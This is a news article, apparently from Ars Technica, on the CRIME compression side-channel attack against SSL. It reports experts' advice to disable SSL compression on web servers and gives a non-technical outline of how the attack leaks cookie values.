CRIME REVISITED —

Many ways to break SSL with CRIME attacks, experts warn

Despite browser fixes, disabling SSL compression on servers may be best defense.

A hexadecimal representation of a compressed POST Web request. By changing characters in attacker-controlled data and comparing the different sizes of the compressed request that results, hackers can figure out the encrypted values of authentication cookies.
A hexadecimal representation of a compressed POST Web request. By changing characters in attacker-controlled data and comparing the different sizes of the compressed request that results, hackers can figure out the encrypted values of authentication cookies.

Security professionals are recommending that operators of websites offering the secure hypertext transfer protocol (HTTPS) disable a bandwidth-saving compression feature to prevent a recently disclosed attack that permits the hijacking of encrypted browsing sessions.

As previously reported by Ars, browsers from Microsoft, Google, Mozilla, Apple, and Opera aren't vulnerable to the exploit dubbed CRIME, which is short for Compression Ratio Info-leak Made Easy. But until recently both Chrome and Firefox users were susceptible to attacks that allowed hackers to decrypt secure cookies used to log in to e-mail and online bank accounts. Given the number of smaller browsers in use, or the possibility some end users may be using out-of-date software, website operators may want to proactively disable compression used during sessions protected by the SSL, or secure sockets layer, protocol.

"It's clear that there are an uncountable number of ways to exploit the vulnerability if it is present," researchers for security firm iSEC Partners wrote in a recent blog post. "Rather than trying to block individual avenues to exploitation—which is likely impossible—we recommend you mitigate the issue at the source by disabling SSL Compression (and SPDY Compression is used.)"

SSL compression is turned on by default in Apache, the Internet's most widely used webserver application. It can be easily turned off in version 2.4.3, but the method for disabling it in the still widely used version 2.2 is less straightforward, the blog post warned. It's also unclear if compression is supported by Amazon's Elastic Load Balancers. Microsoft's competing Internet Information Services doesn't support compression at all. There was no advice offered concerning server-side settings for SPDY.

The iSec Partners blog post provides a simplified overview of how CRIME is able to brute-force crack the secret value of encrypted cookies. It works by comparing the size of compressed data chunks contained in web requests when they contain slightly different attacker-controlled inputs. When the inputs contain values that are also found in the cookie value, the compressed chunk is smaller. "An attacker who can observe the size of the SSL packets can use this technique in an adaptive fashion to learn the exact value of the cookie," the blog post explained.

Researchers Juliano Rizzo (@julianor) and Thai Duong are scheduled to demonstrate the CRIME attack on Friday at the Ekoparty security conference in Buenos Aires.

Channel Ars Technica